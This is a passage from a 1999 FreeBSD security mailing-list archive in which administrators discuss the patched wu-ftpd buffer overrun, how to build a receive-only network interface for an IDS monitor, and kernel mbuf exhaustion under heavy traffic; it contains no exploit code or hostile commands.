Sorry, syslogd doesn't suffer from the same problems that klogd on lamix
does (i.e. it's all datagrams). My mistake.

From owner-freebsd-security Thu Sep 9 6:59:17 1999
Date: Thu, 9 Sep 1999 20:54:08 +0700 (NOVST)
From: "Rashid N. Achilov"
To: Ruslan Ermilov
Cc: Bill Fink, security@FreeBSD.ORG
Subject: Re: FTP Vulnerability
In-Reply-To: <19990909162255.A15548@relay.ucb.crimea.ua>

On Thu, 9 Sep 1999, Ruslan Ermilov wrote:

> > I've visited the mirrors for the WUFTP site(s) looking for the versions
> > "after August 30" and there's NOTHING newer than MAY.
> >
> The versions we are talking about refer to the FreeBSD ports collection.
> Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the
> following patch:
>
> ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch

On this site mapped.overrun... is dated August 24. In the ports tree, in the
patches subdir, the newest patch is dated April 7 :-)

With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Cert. ID: 28514, Granch Ltd.
lead engineer
e-mail: achilov@granch.ru, tel (383-2) 24-2363

From owner-freebsd-security Thu Sep 9 7:17:08 1999
To: "Lowkrantz, Goran"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
From: Dag-Erling Smorgrav
Date: 09 Sep 1999 16:14:59 +0200
In-Reply-To: "Lowkrantz, Goran"'s message of "Thu, 9 Sep 1999 10:37:07 +0200"

"Lowkrantz, Goran" writes:
> 1 - Is it possible to configure a NIC this way?

# ifconfig ed0 up
# tcpdump

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Thu Sep 9 7:18:26 1999
Date: Thu, 9 Sep 1999 17:09:40 +0300
From: Ruslan Ermilov
To: "Rashid N. Achilov"
Cc: Bill Fink, security@FreeBSD.ORG
Subject: Re: FTP Vulnerability
Message-ID: <19990909170940.B51179@relay.ucb.crimea.ua>
References: <19990909162255.A15548@relay.ucb.crimea.ua>
In-Reply-To: from Rashid N. Achilov on Thu, Sep 09, 1999 at 08:54:08PM +0700

On Thu, Sep 09, 1999 at 08:54:08PM +0700, Rashid N. Achilov wrote:
> On Thu, 9 Sep 1999, Ruslan Ermilov wrote:
>
> > > I've visited the mirrors for the WUFTP site(s) looking for the versions
> > > "after August 30" and there's NOTHING newer than MAY.
> > >
> > The versions we are talking about refer to the FreeBSD ports collection.
> > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the
> > following patch:
> >
> > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch
>
> On this site mapped.overrun... is dated August 24.
> In the ports tree, in the patches subdir, the newest patch is dated April 7 :-)
>
Grr... The advisory refers to the version of the FreeBSD port after 1999/08/30:

:RCS file: /home/ncvs/ports/ftp/wu-ftpd/Makefile,v
:head: 1.30
:----------------------------
:revision 1.29
:date: 1999/08/30 19:14:03;  author: cpiazza;  state: Exp;  lines: +4 -1
       ^^^^^^^^^^
:Add a PATCH_FILE to close a security hole in wu-ftpd.
:
:Quoted from wu-ftpd group's announcement:
:
:  Due to insufficient bounds checking on directory name lengths which can
:  be supplied by users, it is possible to overwrite the static memory
:  space of the wu-ftpd daemon while it is executing under certain
:  configurations. By having the ability to create directories and
:  supplying carefully designed directory names to the wu-ftpd, users may
:  gain privileged access.
:
:PR:            13475
:Submitted by:  jack@germanium.xtalwind.net
:=============================================================================

--
Ruslan Ermilov          Sysadmin and DBA of the
ru@ucb.crimea.ua        United Commercial Bank,
ru@FreeBSD.org          FreeBSD committer,
+380.652.247.647        Simferopol, Ukraine

http://www.FreeBSD.org  The Power To Serve
http://www.oracle.com   Enabling The Information Age

From owner-freebsd-security Thu Sep 9 7:24:43 1999
From: "Lowkrantz, Goran"
To: "'Mark Newton'", "Lowkrantz, Goran"
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: Lisen only NIC
Date: Thu, 9 Sep 1999 16:23:04 +0200

Yes!
-----Original Message-----
From: Mark Newton [mailto:newton@atdot.dotat.org]
Sent: Thursday, September 09, 1999 4:15 PM
To: Goran.Lowkrantz@infologigruppen.se
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC

Lowkrantz, Goran wrote:

> To check on our DMZs I am building a monitor system with a protected
> interface connected to the internal network and a multiport card to monitor
> the consoles of the systems in the DMZs. To check for attacks I have set up
> Snort and have tested with the Vision IDS but I want to hide the network
> interface completely so that it can't be seen or heard or attacked or
> anything.

Cut the transmit pin on your patchlead.

  - mark

--------------------------------------------------------------------
I tried an internal modem,                    newton@atdot.dotat.org
     but it hurt when I walked.                       Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Sep 9 7:33:39 1999
From: Darren Reed
Message-Id: <199909091434.AAA06424@cheops.anu.edu.au>
Subject: Re: Lisen only NIC
To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran)
Date: Fri, 10 Sep 1999 00:34:08 +1000 (EST)
Cc: newton@atdot.dotat.org, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG
In-Reply-To: from "Lowkrantz, Goran" at Sep 9, 99 04:23:04 pm

Err, this can do bad things like make your hub/switch think your station
has dropped off the network and hence get 0 packets.

In some mail from Lowkrantz, Goran, sie said:
>
> Yes!
>
> -----Original Message-----
> From: Mark Newton [mailto:newton@atdot.dotat.org]
> Sent: Thursday, September 09, 1999 4:15 PM
> To: Goran.Lowkrantz@infologigruppen.se
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: Lisen only NIC
>
>
> Lowkrantz, Goran wrote:
>
> > To check on our DMZs I am building a monitor system with a protected
> > interface connected to the internal network and a multiport card to monitor
> > the consoles of the systems in the DMZs. To check for attacks I have set up
> > Snort and have tested with the Vision IDS but I want to hide the network
> > interface completely so that it can't be seen or heard or attacked or
> > anything.
>
> Cut the transmit pin on your patchlead.
>
>   - mark
>
> --------------------------------------------------------------------
> I tried an internal modem,                    newton@atdot.dotat.org
>      but it hurt when I walked.                       Mark Newton
> ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Sep 9 7:38:14 1999
From: "Lowkrantz, Goran"
To: "'Dag-Erling Smorgrav'", "Lowkrantz, Goran"
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: Lisen only NIC
Date: Thu, 9 Sep 1999 16:36:54 +0200

Thanks, but this doesn't work with snort, it wants an IP address or dies:

ERROR: OpenPcap() device ep1 network lookup: SIOCGIFADDR: ep1: Can't assign requested address

Cheers,
GLZ

-----Original Message-----
From: Dag-Erling Smorgrav [mailto:des@flood.ping.uio.no]
Sent: Thursday, September 09, 1999 4:15 PM
To: Lowkrantz, Goran
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC

"Lowkrantz, Goran" writes:
> 1 - Is it possible to configure a NIC this way?

# ifconfig ed0 up
# tcpdump

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Thu Sep 9 7:39:36 1999
From: "Lowkrantz, Goran"
To: "'Darren Reed'", "Lowkrantz, Goran"
Cc: newton@atdot.dotat.org, "Lowkrantz,
Goran", freebsd-security@FreeBSD.ORG
Subject: RE: Lisen only NIC
Date: Thu, 9 Sep 1999 16:37:56 +0200

Sorry, I forgot the smiley.

Cheers,
GLZ

-----Original Message-----
From: Darren Reed [mailto:avalon@coombs.anu.edu.au]
Sent: Thursday, September 09, 1999 4:34 PM
To: Goran.Lowkrantz@infologigruppen.se
Cc: newton@atdot.dotat.org; Goran.Lowkrantz@infologigruppen.se; freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC

Err, this can do bad things like make your hub/switch think your station
has dropped off the network and hence get 0 packets.

In some mail from Lowkrantz, Goran, sie said:
>
> Yes!
>
> -----Original Message-----
> From: Mark Newton [mailto:newton@atdot.dotat.org]
> Sent: Thursday, September 09, 1999 4:15 PM
> To: Goran.Lowkrantz@infologigruppen.se
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: Lisen only NIC
>
>
> Lowkrantz, Goran wrote:
>
> > To check on our DMZs I am building a monitor system with a protected
> > interface connected to the internal network and a multiport card to monitor
> > the consoles of the systems in the DMZs. To check for attacks I have set up
> > Snort and have tested with the Vision IDS but I want to hide the network
> > interface completely so that it can't be seen or heard or attacked or
> > anything.
>
> Cut the transmit pin on your patchlead.
>
>   - mark
>
> --------------------------------------------------------------------
> I tried an internal modem,                    newton@atdot.dotat.org
>      but it hurt when I walked.
>                                                       Mark Newton
> ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Sep 9 7:47:10 1999
From: Reinier Bezuidenhout
Message-Id: <199909091446.QAA13441@oskar.nanoteq.co.za>
Subject: Re: Lisen only NIC
In-Reply-To: <199909091434.AAA06424@cheops.anu.edu.au> from Darren Reed at "Sep 10, 99 00:34:08 am"
To: avalon@coombs.anu.edu.au (Darren Reed)
Date: Thu, 9 Sep 1999 16:46:55 +0200 (SAT)
Cc: Goran.Lowkrantz@infologigruppen.se, newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG

> Err, this can do bad things like make your hub/switch think your station
> has dropped off the network and hence get 0 packets.

Yep ... this is true ...
we've tried it before and failed :)

The other thing to do is to try and remove the transmit code from the
card driver :)

Reinier

From owner-freebsd-security Thu Sep 9 7:48:47 1999
From: Mark Newton
Message-Id: <199909091415.XAA72769@atdot.dotat.org>
Subject: Re: Lisen only NIC
To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran)
Date: Thu, 9 Sep 1999 23:45:07 +0930 (CST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "Lowkrantz, Goran" at Sep 9, 99 10:37:07 am

Lowkrantz, Goran wrote:

> To check on our DMZs I am building a monitor system with a protected
> interface connected to the internal network and a multiport card to monitor
> the consoles of the systems in the DMZs. To check for attacks I have set up
> Snort and have tested with the Vision IDS but I want to hide the network
> interface completely so that it can't be seen or heard or attacked or
> anything.

Cut the transmit pin on your patchlead.

  - mark

--------------------------------------------------------------------
I tried an internal modem,                    newton@atdot.dotat.org
     but it hurt when I walked.
                                                      Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Sep 9 7:48:56 1999
To: "Lowkrantz, Goran"
Cc: "'Dag-Erling Smorgrav'", freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
From: Dag-Erling Smorgrav
Date: 09 Sep 1999 16:46:59 +0200
In-Reply-To: "Lowkrantz, Goran"'s message of "Thu, 9 Sep 1999 16:36:54 +0200"

"Lowkrantz, Goran" writes:
> Thanks, but this doesn't work with snort, it wants an IP address or dies

Well, then, use a NIC with an AUI port and cut the TX pin in the
transceiver.
DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Thu Sep 9 7:51:35 1999
From: "Lowkrantz, Goran"
To: "'Reinier Bezuidenhout'", avalon@coombs.anu.edu.au
Cc: "Lowkrantz, Goran", newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG
Subject: RE: Lisen only NIC
Date: Thu, 9 Sep 1999 16:48:40 +0200

Couldn't this work if this NIC with the no-TX cable was using the same IP
address as another, active computer on the same segment?

GLZ

-----Original Message-----
From: Reinier Bezuidenhout [mailto:rbezuide@oskar.nanoteq.co.za]
Sent: Thursday, September 09, 1999 4:47 PM
To: avalon@coombs.anu.edu.au
Cc: Goran.Lowkrantz@infologigruppen.se; newton@atdot.dotat.org; freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC

> Err, this can do bad things like make your hub/switch think your station
> has dropped off the network and hence get 0 packets.

Yep ... this is true ...
we've tried it before and failed :)

The other thing to do is to try and remove the transmit code from the
card driver :)

Reinier

From owner-freebsd-security Thu Sep 9 7:57:02 1999
Message-ID: <0C0F7D2A7354D311B79100A0C9EA54E12F6F6F@ctcjst-mail1.ctc.com>
From: "Cameron, Frank"
To: "'freebsd-security@freebsd.org'"
Cc: "'Darren Reed'"
Subject: RE: Lisen only NIC
Date: Thu, 9 Sep 1999 10:55:06 -0400

I was reading an old article from AT&T Bell Labs that talked about cutting
the transmit line and doing a few other things so a machine could listen
but not speak.
There Be Dragons: http://www.rootshell.org/docs/dragons_bellovin.ps.gz

> -----Original Message-----
> From: Darren Reed [SMTP:avalon@coombs.anu.edu.au]
> Sent: Thursday, September 09, 1999 10:34 AM
> To: Goran.Lowkrantz@infologigruppen.se
> Cc: newton@atdot.dotat.org; Goran.Lowkrantz@infologigruppen.se;
> freebsd-security@FreeBSD.ORG
> Subject: Re: Lisen only NIC
>
> Err, this can do bad things like make your hub/switch think your station
> has dropped off the network and hence get 0 packets.
>
> In some mail from Lowkrantz, Goran, sie said:
> >
> > Yes!
> >
> > Cut the transmit pin on your patchlead.
> >
> >   - mark
> >

From owner-freebsd-security Thu Sep 9 7:59:13 1999
Date: Thu, 9 Sep 1999 16:58:34 +0200
From: Udo Schweigert
To: "Rashid N.
Achilov"
Cc: Ruslan Ermilov, Bill Fink, security@FreeBSD.ORG
Subject: Re: FTP Vulnerability
Message-ID: <19990909165834.A51466@alaska.cert.siemens.de>
References: <19990909162255.A15548@relay.ucb.crimea.ua>

On Thu, Sep 09, 1999 at 08:54:08PM +0700, Rashid N. Achilov wrote:
> On Thu, 9 Sep 1999, Ruslan Ermilov wrote:
>
> > > I've visited the mirrors for the WUFTP site(s) looking for the versions
> > > "after August 30" and there's NOTHING newer than MAY.
> > >
> > The versions we are talking about refer to the FreeBSD ports collection.
> > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the
> > following patch:
> >
> > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch
>
> On this site mapped.overrun... is dated August 24.
> In the ports tree, in the patches subdir, the newest patch is dated April 7 :-)
>
That's OK, because the patch will be downloaded when doing the "make".
Makefile contains:

PATCH_SITES=    ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/
PATCHFILES=     \
                data-limit.patch \
                deny.not.nameserved.patch \
                mapped.path.overrun.patch \
                not.in.class.patch \
                rfc931.timeout.patch

Regards
-------------------------------------------------------------------------------
Udo Schweigert               || Voice : +49 89 636 42170
Siemens AG, Siemens CERT     || Fax   : +49 89 636 48000
ZT IK 3                      || email : Udo.Schweigert@mchp.siemens.de
D-81730 Muenchen / Germany   ||       : ust@cert.siemens.de
PGP fingerprint              || 2A 53 F6 A6 30 59 64 02  6B C4 E0 73 B2 C9 6C E7
-------------------------------------------------------------------------------

From owner-freebsd-security Thu Sep 9 8:09:02 1999
Date: Thu, 9 Sep 1999 11:07:20 -0400
From: Jared Mauch
To: Stas Kisel
Cc: avalon@coombs.anu.edu.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: mbuf shortage situations
Message-ID: <19990909110720.A6694@puck.nether.net>
References: <199909091015.UAA02113@cheops.anu.edu.au> <199909090945.NAA18133@sonet.crimea.ua>
In-Reply-To: <199909090945.NAA18133@sonet.crimea.ua>

On Thu, Sep 09, 1999 at 01:45:39PM +0400, Stas Kisel wrote:
> > From: Darren Reed
> >
> > The problem with this is the BSD TCP/IP
> > implementation ACK's (or at least
> > attempts to ACK) data as soon as it is received and it is a big no-no to
> > discard queued data that has already been ACK'd.
>
> Probably it is not self-evident why we HAVE to drop this connection.
>
> It is an evil connection. Good applications do read data from their sockets,
> and evil ones do not. And even if it is a good but silly or busy
> application, good clients do not send so much data that the application
> cannot process it. Am I wrong? Are there any examples?

(I have a program that is built to process this all, and works well on the
non-*bsd unices, and has had a few problems on the *bsd based ones.. read
on...)

I posted a message on bugtraq related to this, and archive related mail to
-current links are here:

http://www.freebsd.org/cgi/getmsg.cgi?fetch=340672+354590+/usr/local/www/db/text/1998/freebsd-current/19980524.freebsd-current
http://www.freebsd.org/cgi/getmsg.cgi?fetch=246072+248435+/usr/local/www/db/text/1998/freebsd-current/19980524.freebsd-current

Now the problems that I have are partially design issues in my program, and
partially not. I am creating about 100 icmp sockets, and as they are
created, allocate a very large SO_RCVBUF:

    (void)setsockopt(localstruct->icmp_s, SOL_SOCKET, SO_RCVBUF,
        (char *)&hold, sizeof(hold));

Where hold = (60*300), i.e. hold 300 packets. Because I can be sending 100
icmp echo-requests out in a second, I can get at least that many replies
back, if not more if some come out of order or delayed by more than 1
second. I also need to filter through all the icmp traffic that is coming
to the system. (You can see my code, and comments are welcome to me
directly, code available from ftp://puck.nether.net/pub/jared/sysmon* [if
possible, my -current is in jared/beta/*, use that, but there have been
little changes to that code currently]).

I would run out of mbufs, increase maxusers.
Either my code is less aggressive than originally, or something has
changed in some of the freebsd releases since then, even slightly to
prevent this from currently happening. I'm not sure which. NetBSD also
suffers from this problem, and is more evident than FreeBSD right now.

	- Jared

--
Jared Mauch  | pgp key available via finger from jared@puck.nether.net
clue++;      | http://puck.nether.net/~jared/  My statements are only mine.
END OF LINE  |

From owner-freebsd-security Thu Sep 9 08:12:24 1999
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id BD3EB151CD for ; Thu, 9 Sep 1999 08:12:18 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA00959; Thu, 9 Sep 1999 17:11:50 +0200 (CEST) (envelope-from des)
To: Mark Newton
Cc: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran), freebsd-security@FreeBSD.ORG
Subject: Re: Lisen only NIC
References: <199909091415.XAA72769@atdot.dotat.org>
From: Dag-Erling Smorgrav
Date: 09 Sep 1999 17:11:49 +0200
In-Reply-To: Mark Newton's message of "Thu, 9 Sep 1999 23:45:07 +0930 (CST)"
Lines: 18
X-Mailer: Gnus v5.5/Emacs 19.34

Mark Newton writes:
> Lowkrantz, Goran wrote:
> > To check on our DMZs I am building a monitor system with a protected
> > interface connected to the internal network and a multiport card to monitor
> > the consoles of the systems in the DMZs. To check for attacks I have setup
> > Snort and have tested with the Vision IDS but I want to hide the network
> > interface completely so that it can't be seen or heard or attacked or
> > anything.
> Cut the transmit pin on your patchlead.

No. You'll lose link.
Instead, use an external transceiver and cut the
transmit pin on the AUI end of the transceiver. Search the BUGTRAQ
archives for URLs to detailed descriptions of how to do this (and why
cutting the transmit pin on a 10BaseT patch cable won't work)

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Thu Sep 9 08:12:40 1999
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 6F4ED15CB8 for ; Thu, 9 Sep 1999 08:12:17 -0700 (PDT) (envelope-from sthaug@nethelp.no)
Received: (qmail 4514 invoked by uid 1001); 9 Sep 1999 15:11:55 +0000 (GMT)
To: Goran.Lowkrantz@infologigruppen.se
Cc: rbezuide@oskar.nanoteq.co.za, avalon@coombs.anu.edu.au, newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG
Subject: RE: Lisen only NIC
From: sthaug@nethelp.no
In-Reply-To: Your message of "Thu, 9 Sep 1999 16:48:40 +0200 "
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Date: Thu, 09 Sep 1999 17:11:55 +0200
Message-ID: <4512.936889915@verdi.nethelp.no>

> Couldn't this work if this NIC with the no-TX cable was using the same IP
> address as another, active computer on the same segment?

No. There are "link pulses" sent on this cable at regular intervals. If
you cut the cable, link down is detected. If you want a "receive only"
TP cable, you need some electronics.
There are companies that make these, see for instance
http://www.anzen.com/afj/afj_faq.html#anchor157338

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Thu Sep 9 08:51:03 1999
Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 23BC114C1C; Thu, 9 Sep 1999 08:47:50 -0700 (PDT) (envelope-from stas@sonet.crimea.ua)
Received: (from stas@localhost) by sonet.crimea.ua (8.8.8/8.8.8) id SAA24055; Thu, 9 Sep 1999 18:47:49 +0400 (MSD) (envelope-from stas)
Date: Thu, 9 Sep 1999 18:47:49 +0400 (MSD)
From: Stas Kisel
Message-Id: <199909091447.SAA24055@sonet.crimea.ua>
To: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua
Subject: Re: mbuf shortage situations
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <199909091315.XAA05192@cheops.anu.edu.au>

> From avalon@cheops.anu.edu.au Thu Sep 9 16:17:27 1999
>
> > Probably it is not self-evident why we HAVE to drop this connection.
>
> So what if someone manages to crash a program due to a DOS attack ?
> An easy one that comes to mind is syslogd. It's often stuck in disk-wait
> and can easily be targeted with a large number of packets.

1. If syslog ever used (or will use) TCP, it should drop the connection
which is logging data too quickly. OS shouldn't kill process, only drop
connection. So no crash. More examples?

2. udp_drain() may either drop all packets or intellectually select
"offending" socket and try to avoid deletion of "right" packets and
simplifying spoofing. RFC allows 1st way, but 2nd can improve OS.

3. Another idea. Apart from the *_drain() method. Probably I will try
to implement it someday (quite low probability, though).
Set TCP window in packets according to really available kernel memory.
Available memory should be distributed non-uniformly between maximum
number of sockets. So 1st socket has window = 64k - still_not_read_data,
and 1024th has window = MIN_WINDOW - still_not_read_data. MIN_WINDOW
should be determined for max efficiency. About 2k. Distribution can not
be linear - it is approximately like min(NORM*1/x, 64k). Exactly it can
be determined via functional equation. Something like

	\int_0^{maxsockets} dist(x) dx = kernel_memory

and several conditions. (sorry for my poor TeX).

In a case of attack new sockets will be created with a very small window
- about 2k.

Please blame me as much as possible - probably I have missed some
significant detail. Probably all this math suxx and the best is a
"stair" function - somebody already works on lowering TCP window, if
I'm not mistaken.

--
Stas Kisel. UNIX, security, C, TCP/IP, Web. UNIX - the best adventure game
http://www.tekmetrics.com/transcript.shtml?pid=20053
http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu
stas@sonet.crimea.ua ; 2:460/54.4

From owner-freebsd-security Thu Sep 9 10:01:28 1999
Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (Postfix) with ESMTP id 0C82215024; Thu, 9 Sep 1999 10:01:24 -0700 (PDT) (envelope-from mike@dingo.cdrom.com)
Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.3/8.8.8) with ESMTP id JAA00464; Thu, 9 Sep 1999 09:53:44 -0700 (PDT) (envelope-from mike@dingo.cdrom.com)
Message-Id: <199909091653.JAA00464@dingo.cdrom.com>
X-Mailer: exmh version 2.0.2 2/24/98
To: Jared Mauch
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: mbuf shortage situations
In-reply-to: Your message of "Thu, 09 Sep 1999 11:07:20 EDT."
	<19990909110720.A6694@puck.nether.net>
Date: Thu, 09 Sep 1999 09:53:44 -0700
From: Mike Smith

> I would get out of mbufs, increase maxusers. Either my code
> is less aggressive than originally, or something has changed in
> some of the freebsd releases since then, even slightly to prevent this
> from currently happening. I'm not sure which. NetBSD also suffers
> from this problem, and is more evident than FreeBSD right now.

Maxusers was bumped in the FreeBSD GENERIC kernel, partly to deal with
situations like yours where the old default was simply too small.

--
\\ The mind's the standard       \\ Mike Smith
\\ of the man.                   \\ msmith@freebsd.org
\\    -- Joseph Merrick          \\ msmith@cdrom.com

From owner-freebsd-security Thu Sep 9 10:24:37 1999
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 49E9B152A3 for ; Thu, 9 Sep 1999 10:24:33 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA18571; Thu, 9 Sep 1999 10:21:20 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <199909091721.KAA18571@gndrsh.dnsmgr.net>
Subject: Re: Lisen only NIC
In-Reply-To: from Dag-Erling Smorgrav at "Sep 9, 1999 05:11:49 pm"
To: des@flood.ping.uio.no (Dag-Erling Smorgrav)
Date: Thu, 9 Sep 1999 10:21:20 -0700 (PDT)
Cc: newton@atdot.dotat.org (Mark Newton), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]

> Mark Newton writes:
> > Lowkrantz, Goran wrote:
> > > To check on our DMZs I am building a monitor system with a protected
> > > interface connected to the internal network and a multiport card to monitor
> > > the consoles of the systems in the DMZs. To check for attacks I have setup
> > > Snort and have tested with the Vision IDS but I want to hide the network
> > > interface completely so that it can't be seen or heard or attacked or
> > > anything.
> > Cut the transmit pin on your patchlead.
>
> No. You'll lose link. Instead, use an external transceiver and cut the
> transmit pin on the AUI end of the transceiver. Search the BUGTRAQ
> archives for URLs to detailed descriptions of how to do this (and why
> cutting the transmit pin on a 10BaseT patch cable won't work)

Do any of them talk about drilling the trace between the NIC chip and
the MAU chip/isolation? That's where the ``AUI'' cable is now :-)

This is often best done on the input side of the isolation transformer
so that the input to the MAU chip is still properly balanced.
--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Sep 9 10:36:57 1999
Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 7ABB015833 for ; Thu, 9 Sep 1999 10:36:53 -0700 (PDT) (envelope-from freebsd@deepwell.com)
Received: (qmail 28630 invoked from network); 9 Sep 1999 18:21:00 -0000
Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 9 Sep 1999 18:21:00 -0000
Message-Id: <4.2.0.58.19990909102743.03450da0@mail1.dcomm.net>
X-Sender: freebsd@mail.deepwell.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Thu, 09 Sep 1999 10:27:56 -0700
To: Darren Reed , Goran.Lowkrantz@infologigruppen.se, freebsd-security@freebsd.org
From: Deepwell Internet
Subject: Re: Lisen only NIC

Yes, I remember hearing that 10Base-T needs a "heartbeat" signal on the
TX lead. I think your best bet is to use an AUI card with an AUI to
10Base-T adapter. You can cut leads from the AUI adapter.

At 12:34 AM 9/10/99 +1000, you wrote:
>Err, this can do bad things like make your hub/switch think your station
>has dropped off the network and hence get 0 packets.
>
>In some mail from Lowkrantz, Goran, sie said:
> >
> > Yes!
> >
> > -----Original Message-----
> > From: Mark Newton [mailto:newton@atdot.dotat.org]
> > Sent: Thursday, September 09, 1999 4:15 PM
> > To: Goran.Lowkrantz@infologigruppen.se
> > Cc: freebsd-security@FreeBSD.ORG
> > Subject: Re: Lisen only NIC
> >
> >
> > Lowkrantz, Goran wrote:
> >
> > > To check on our DMZs I am building a monitor system with a protected
> > > interface connected to the internal network and a multiport card to
> > monitor
> > > the consoles of the systems in the DMZs. To check for attacks I have
> > setup
> > > Snort and have tested with the Vision IDS but I want to hide the network
> > > interface completely so that it can't be seen or heard or attacked or
> > > anything.
> >
> > Cut the transmit pin on your patchlead.
> >
> > - mark
> >
> > --------------------------------------------------------------------
> > I tried an internal modem,                    newton@atdot.dotat.org
> > but it hurt when I walked.                           Mark Newton
> > ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Thu Sep 9 10:44:34 1999
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id DE290152DF for ; Thu, 9 Sep 1999 10:44:30 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA18619; Thu, 9 Sep 1999 10:42:09 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <199909091742.KAA18619@gndrsh.dnsmgr.net>
Subject: Re: Lisen only NIC
In-Reply-To: <199909091721.KAA18571@gndrsh.dnsmgr.net> from "Rodney W. Grimes" at "Sep 9, 1999 10:21:20 am"
To: freebsd@gndrsh.dnsmgr.net (Rodney W. Grimes)
Date: Thu, 9 Sep 1999 10:42:09 -0700 (PDT)
Cc: des@flood.ping.uio.no (Dag-Erling Smorgrav), newton@atdot.dotat.org (Mark Newton), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]

> > Mark Newton writes:
> > > Lowkrantz, Goran wrote:
> > > > To check on our DMZs I am building a monitor system with a protected
> > > > interface connected to the internal network and a multiport card to monitor
> > > > the consoles of the systems in the DMZs. To check for attacks I have setup
> > > > Snort and have tested with the Vision IDS but I want to hide the network
> > > > interface completely so that it can't be seen or heard or attacked or
> > > > anything.
> > > Cut the transmit pin on your patchlead.
> >
> > No. You'll lose link. Instead, use an external transceiver and cut the
> > transmit pin on the AUI end of the transceiver. Search the BUGTRAQ
> > archives for URLs to detailed descriptions of how to do this (and why
> > cutting the transmit pin on a 10BaseT patch cable won't work)
>
> Do any of them talk about drilling the trace between the NIC chip and
> the MAU chip/isolation? That's where the ``AUI'' cable is now :-)
>
> This is often best done on the input side of the isolation transformer
> so that the input to the MAU chip is still properly balanced.

Strike that last comment, the isolation transformer location depends on
the type of MAU, it may be on the wrong side and ends up being the
same thing as cutting the patch cord.
What was I thinking!! Anyway for 10Base2 this is almost always trivial,
